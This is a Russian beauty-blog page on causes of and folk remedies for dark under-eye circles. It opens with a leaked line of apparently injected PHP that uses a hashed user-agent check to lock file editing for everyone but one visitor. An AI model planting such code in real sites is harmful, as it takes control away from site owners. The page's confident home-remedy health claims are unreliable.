if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Синяки под глазами — проблема современного человека | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Синяки под глазами — проблема современного человека

Темные синяки приносят большой дискомфорт, особенно женской половине. Но почему они появляются и как от них избавиться?

Тем­ные синя­ки под гла­за­ми – это одна из глав­ных про­блем совре­мен­но­сти. Они могут быть блед­ны­ми у одних людей, а у дру­гих – тем­но-фио­ле­то­вые. Мно­гие жен­щи­ны ощу­ща­ют дис­ком­форт, когда на сво­ем лице обна­ру­жи­ва­ют такую непри­ят­ность и уход за кожей лица пре­вра­ща­ет­ся в пытку.

Причины

Кожа вокруг глаз может мно­гое рас­ска­зать о состо­я­нии орга­низ­ма и нали­чии воз­мож­ных пато­ло­гий. Синя­ки под гла­за­ми – это резуль­тат обра­за жиз­ни и раз­лич­ных забо­ле­ва­ний. Непра­виль­ный образ жиз­ни – это враг здо­ро­вья и кра­со­ты. Тем­ные синя­ки вокруг глаз воз­ни­ка­ют по мно­гим причинам:

  • недо­ста­ток сна. От недо­сы­па­нию кожа ста­но­вит­ся блед­нее и кро­ве­нос­ные сосу­ды ста­но­вят­ся заметнее;
  • пагуб­ные при­выч­ки, осо­бен­но курение;
  • дол­гое вре­мя­про­вож­де­ние за компьютером;

стрес­сы, уста­лость и пере­утом­ле­ние. В клет­ках кожи замед­ля­ет­ся про­цесс выве­де­ния ток­си­нов, вслед­ствие чего воз­ни­ка­ет недо­ста­ток кис­ло­ро­да и вла­ги. chto-oznachayut-sinyaki-pod-glazami Для устра­не­ния про­бле­мы доста­точ­но нор­ма­ли­зо­вать пита­ние и сон. Через неде­лю кожа вос­ста­но­вит­ся, а кру­ги под гла­за­ми исчез­нут. При рабо­те за ком­пью­те­ром спе­ци­а­ли­сты сове­ту­ют делать пере­рыв раз в пол­ча­са-час. Лечеб­ная кос­ме­ти­ка в таком слу­чае не помо­жет, а толь­ко замас­ки­ру­ет про­бле­му. По ста­ти­сти­ке прак­ти­че­ски у каж­до­го чело­ве­ка есть какое-либо забо­ле­ва­ние. Тем­ные синя­ки под гла­за­ми вызывают:

  • про­бле­мы с щито­вид­ной железой;
  • сбои в рабо­те сер­деч­но-сосу­ди­стой системы;
  • аллер­гия.

Отеч­ность век так­же может быть при­чи­ной появ­ле­ния кру­гов под гла­за­ми. Это про­ис­хо­дит из-за нару­ше­ния обме­на жид­ко­сти в орга­низ­ма. Поэто­му сле­ду­ет огра­ни­чить упо­треб­ле­ние ост­рых и соле­ных блюд, а так­же отка­зать­ся от алкоголя.

Народные рецепты от синяков под глазами

sinyaki_glaza_2 Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми счи­та­ет­ся луч­шей и самой эффек­тив­ной. При­моч­ки – это экс­пресс метод избав­ле­ния от синя­ков. Их гото­вят из раз­лич­ных ингредиентов:

  1. Кар­то­фель­ное пюре раз­во­дят моло­ком в про­пор­ции (2:1).
  2. Тво­рог (обя­за­тель­но дол­жен быть жир­ным) хоро­шо пере­ме­ши­ва­ют, что­бы не было круп­ных частиц и добав­ля­ют несколь­ко капель чер­но­го чая.

Пред­ва­ри­тель­но сред­ства сле­ду­ет завер­нуть в мар­лю или хлоп­ча­то­бу­маж­ную ткань. Накла­ды­вать на закры­тые гла­за без маки­я­жа на 15–20 минут. От тем­ных кру­гов под гла­за­ми, кото­рые появи­лись вслед­ствие непра­виль­но­го пита­ния или недо­стат­ка сна, исполь­зу­ют зелень. Необ­хо­ди­мо в рав­ных про­пор­ци­ях сме­шать огу­рец и пет­руш­ку, пред­ва­ри­тель­но измель­чив их. Затем доба­вить сме­та­ны. Бес­плат­ная кос­ме­ти­ка, ингре­ди­ен­ты кото­рой есть на каж­дой кухне, помо­жет быст­ро и эффек­тив­но изба­вить­ся от синя­ков под глазами.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!